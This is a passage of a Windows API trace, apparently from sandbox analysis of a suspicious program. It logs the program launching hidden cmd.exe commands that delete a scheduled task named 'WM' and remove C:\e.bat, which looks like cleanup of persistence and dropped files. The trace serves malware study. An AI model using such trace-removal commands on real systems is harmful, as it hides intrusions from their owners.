dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0141.652] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123ba340, nSize=0x64 | out: lpBuffer="") returned 0x63 [0141.652] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b0878 | out: lpFileInformation=0x123b0878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0141.652] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123ba410, nSize=0x64 | out: lpBuffer="") returned 0x35 [0141.652] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b08c8 | out: lpFileInformation=0x123b08c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0141.652] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.653] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0141.653] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0141.653] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0141.653] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0141.653] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0141.653] GetEnvironmentStringsW () returned 0x8ea900* [0141.689] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0141.690] GetCurrentProcess () returned 0xffffffff [0141.690] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x158, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12392960, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12392960*=0x130) returned 1 [0141.690] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12392964, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12392964*=0x13c) returned 1 [0141.690] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12392968, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12392968*=0x140) returned 1 [0141.690] VirtualAlloc (lpAddress=0x0, dwSize=0xafc7c, flAllocationType=0x3000, flProtect=0x4) returned 0x32c00000 [0141.692] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"schtasks /delete /tn WM /F \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x123e2a80, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x130, hStdOutput=0x13c, hStdError=0x140), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"schtasks /delete /tn WM /F \"", lpProcessInformation=0x123a3a80*(hProcess=0x154, hThread=0x144, dwProcessId=0xa08, dwThreadId=0xe88)) returned 1 [0141.755] SetEvent (hEvent=0x150) returned 1 [0141.755] CloseHandle (hObject=0x144) returned 1 [0141.755] CloseHandle (hObject=0x140) returned 1 [0141.755] CloseHandle (hObject=0x13c) returned 1 [0141.755] CloseHandle (hObject=0x130) returned 1 [0141.756] CloseHandle (hObject=0x158) returned 1 [0141.756] CloseHandle (hObject=0x138) returned 1 [0141.756] CloseHandle (hObject=0x134) returned 1 [0141.756] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0143.735] SetEvent (hEvent=0x150) returned 1 [0143.736] GetExitCodeProcess (in: hProcess=0x154, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x1) returned 1 [0143.736] GetProcessTimes (in: hProcess=0x154, lpCreationTime=0x12390f60, lpExitTime=0x12390f68, lpKernelTime=0x12390f70, lpUserTime=0x12390f78 | out: lpCreationTime=0x12390f60, lpExitTime=0x12390f68, lpKernelTime=0x12390f70, lpUserTime=0x12390f78) returned 1 [0143.736] CloseHandle (hObject=0x154) returned 1 [0143.737] SetEvent (hEvent=0x128) returned 1 [0143.737] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x4) returned 0x102 [0143.743] SetEvent (hEvent=0x150) returned 1 [0143.743] SetEvent (hEvent=0x128) returned 1 [0143.744] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e8000, nSize=0x64 | out: lpBuffer="") returned 0x35 [0143.744] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f0008 | out: lpFileInformation=0x123f0008*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0143.745] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0143.745] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x123f0058 | out: lpFileInformation=0x123f0058*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0143.745] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0143.745] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f00a8 | out: lpFileInformation=0x123f00a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0143.745] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0143.745] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x123f00f8 | out: lpFileInformation=0x123f00f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0143.745] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0143.745] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x123f0148 | out: lpFileInformation=0x123f0148*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0143.745] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0143.746] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x123f0198 | out: lpFileInformation=0x123f0198*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0143.746] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0143.746] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x123f01e8 | out: lpFileInformation=0x123f01e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0143.746] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0143.746] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x123f0238 | out: lpFileInformation=0x123f0238*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0143.746] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0143.746] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x123f0288 | out: lpFileInformation=0x123f0288*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0143.746] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0143.746] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x123f02d8 | out: lpFileInformation=0x123f02d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0143.746] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0143.747] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x123f0328 | out: lpFileInformation=0x123f0328*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0143.747] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0143.747] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x123f0378 | out: lpFileInformation=0x123f0378*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0143.747] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0143.747] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123e80d0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0143.747] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f03c8 | out: lpFileInformation=0x123f03c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0143.756] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e81a0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0143.756] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f0418 | out: lpFileInformation=0x123f0418*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0143.756] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0143.756] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0143.757] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0143.757] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0143.757] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0143.757] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0143.757] GetEnvironmentStringsW () returned 0x8ea900* [0143.758] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0143.759] GetCurrentProcess () returned 0xffffffff [0143.759] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234e470, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234e470*=0x158) returned 1 [0143.759] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234e474, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234e474*=0x130) returned 1 [0143.759] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234e478, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234e478*=0x13c) returned 1 [0143.760] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"del C:\\e.bat\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12418000, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x158, hStdOutput=0x130, hStdError=0x13c), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"del C:\\e.bat\"", lpProcessInformation=0x123a3a80*(hProcess=0x144, hThread=0x140, dwProcessId=0xe2c, dwThreadId=0xab0)) returned 1 [0143.902] SetEvent (hEvent=0x150) returned 1 [0143.902] CloseHandle (hObject=0x140) returned 1 [0143.902] CloseHandle (hObject=0x13c) returned 1 [0143.902] CloseHandle (hObject=0x130) returned 1 [0143.902] CloseHandle (hObject=0x158) returned 1 [0143.903] CloseHandle (hObject=0x154) returned 1 [0143.903] CloseHandle (hObject=0x134) returned 1 [0143.903] CloseHandle (hObject=0x138) returned 1 [0143.903] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0144.390] SetEvent (hEvent=0x150) returned 1 [0144.390] GetExitCodeProcess (in: hProcess=0x144, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x0) returned 1 [0144.391] GetProcessTimes (in: hProcess=0x144, lpCreationTime=0x1234c880, lpExitTime=0x1234c888, lpKernelTime=0x1234c890, lpUserTime=0x1234c898 | out: lpCreationTime=0x1234c880, lpExitTime=0x1234c888, lpKernelTime=0x1234c890, lpUserTime=0x1234c898) returned 1 [0144.391] CloseHandle (hObject=0x144) returned 1 [0144.391] SetEvent (hEvent=0x128) returned 1 [0144.391] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0144.399] SetEvent (hEvent=0x150) returned 1 [0144.399] SetEvent (hEvent=0x128) returned 1 [0144.399] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123ba4e0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0144.399] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b0918 | out: lpFileInformation=0x123b0918*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.399] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.399] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x123b0968 | out: lpFileInformation=0x123b0968*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.400] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.400] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b09b8 | out: lpFileInformation=0x123b09b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.400] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.400] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x123b0a08 | out: lpFileInformation=0x123b0a08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.400] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.400] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x123b0a58 | out: lpFileInformation=0x123b0a58*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.400] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.400] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x123b0aa8 | out: lpFileInformation=0x123b0aa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.400] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.401] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x123b0af8 | out: lpFileInformation=0x123b0af8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, 